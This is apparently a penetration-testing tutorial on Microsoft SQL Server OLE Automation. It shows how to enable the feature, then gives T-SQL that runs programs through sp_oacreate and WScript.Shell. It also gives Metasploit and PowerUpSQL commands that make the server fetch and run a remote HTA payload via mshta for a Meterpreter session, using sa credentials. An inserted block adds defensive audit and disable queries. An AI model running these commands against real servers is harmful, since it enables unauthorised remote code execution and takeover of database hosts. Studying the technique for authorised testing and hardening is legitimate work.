OLE automation is a mechanism through which an application can access and manipulate objects implemented in other applications. In this article, we will see how to use OLE automation to our benefit.
Table of contents:
· What is OLE Automation?
· What are Facets?
· How to enable OLE Automation?
· Exploiting OLE Automation
What is OLE Automation?
OLE stands for Object Linking and Embedding. Microsoft developed this technology to make it easier for applications to share their data. Automation lets an application manipulate objects that are implemented in other applications. An automation server exposes its features through COM interfaces; client applications use those interfaces to retrieve the server's objects, read their properties and call their methods, and can therefore script the server's functionality.
What are Facets?
Facets help to manage databases through their own set of policy-based functions. MS-SQL ships with a number of predefined Facets. For instance, the Surface Area Configuration facet describes the features that are off by default. This comes in handy when you have multiple SQL environments: you can configure a Facet in one server's environment and copy it to another SQL environment by importing the exported file into an instance of the server as a policy.
How to enable OLE automation?
On a newly installed MS-SQL server, many features are disabled by default, and enabling or disabling the functions provided by the SQL server can be done through Facets. There are two methods to enable OLE automation.
The first method is to enable it from SQL Server Management Studio. Open the studio and right-click on the server. A drop-down menu will appear. From this menu, click on Facets, as shown in the image below:
A dialogue box will open, which provides you with a facet drop-down list. From this drop-down list, choose Surface Area Configuration, as shown in the image below:
Once you have chosen Surface Area Configuration, select the value True for OleAutomationEnabled in the Facet properties section, as shown in the image below:
After following the above steps, click the OK button in the dialogue box to enable OLE Automation.
The second method to enable OLE automation is via SQL queries. Before we move on to the queries, let's make one thing clear: if the value for OLE automation is 1, it is enabled. Similarly, if the value is set to 0, OLE automation is disabled.
So, to confirm whether OLE Automation is enabled or disabled, we will use the following query:
EXEC sp_configure 'Ole Automation Procedures';
GO
As you can see in the image above, config_value and run_value are both 0, which means OLE Automation is disabled. Now, to enable it, run the following query:
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
Once the query has executed, you can use the first query again to check the status of OLE automation. As you can see in the image below, the query changes the value from 0 to 1 and enables OLE automation in the process.
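As an added example (not from the original article), the same check expressed against sys.configurations so it can be run as a scripted audit, a list of who can actually call the OLE procedures once the option is on, and the reverse change that turns the feature back off. Only the two configuration option names come from the article; everything else is my own.

```sql
-- Added example: audit the two options the article toggles. Run in master as a sysadmin.
SELECT name,
       value        AS configured_value,   -- same as config_value in sp_configure
       value_in_use AS running_value,      -- same as run_value
       CASE WHEN value_in_use = 1 THEN 'ENABLED' ELSE 'disabled' END AS state
FROM sys.configurations
WHERE name IN (N'show advanced options', N'Ole Automation Procedures');

-- Who can call sp_OACreate once the option is on: by default only members of the
-- sysadmin fixed server role, so list them (and whether each login is disabled).
SELECT m.name AS sysadmin_member, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- Hardening: switch Ole Automation Procedures back off and hide advanced options
-- again. RECONFIGURE is required after each change, exactly as in the article.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;
```

Re-running the first SELECT afterwards should show running_value 0 for Ole Automation Procedures.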
Exploiting OLE Automation
Now that we have activated OLE automation, we can execute a short query to run any application. For instance, in the image below, we are entering a query that runs the calculator. As you can observe, the query uses COM to call the application. The query is:
DECLARE @output INT
DECLARE @ProgramToRun VARCHAR(255)
SET @ProgramToRun = 'Run("calc.exe")'
EXEC sp_oacreate 'wScript.Shell', @output out
EXEC sp_oamethod @output, @ProgramToRun
EXEC sp_oadestroy @output
Once you run the above query, it will launch the calculator application. Using the same logic, we will now exploit OLE automation to our benefit via Metasploit and the PowerUpSQL tool. Open Metasploit and run the following set of commands to generate an HTA URL, which, once executed, will provide us with a Metasploit session.
use exploit/windows/misc/hta_server
set srvhost <local IP address>
exploit
As expected, the above exploit generated a URL for us. Now, go to PowerShell and use the following set of commands to obtain the session:
cd PowerUpSQL-master
powershell
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmdOle -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Command "mshta.exe http://192.168.1.2:8080/pr2e96MyVedJ6.hta" -Verbose
Once the above commands have executed, you will have your session, as shown in the image below:
Note: you will only get a Meterpreter session if you have the username and password of the server.
You can also run any command supported by the server through PowerShell, as shown in the image below. Here we ran the ipconfig command to find the server's IP address. The command is:
Invoke-SQLOSCmdOle -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Command ipconfig -Verbose
Executing the above command saves the result in a text file in the temp folder, as shown in the image below:
This way, you can exploit or manipulate OLE Automation as you need. Knowing such methods goes a long way, as it helps in penetration testing an MS-SQL server environment.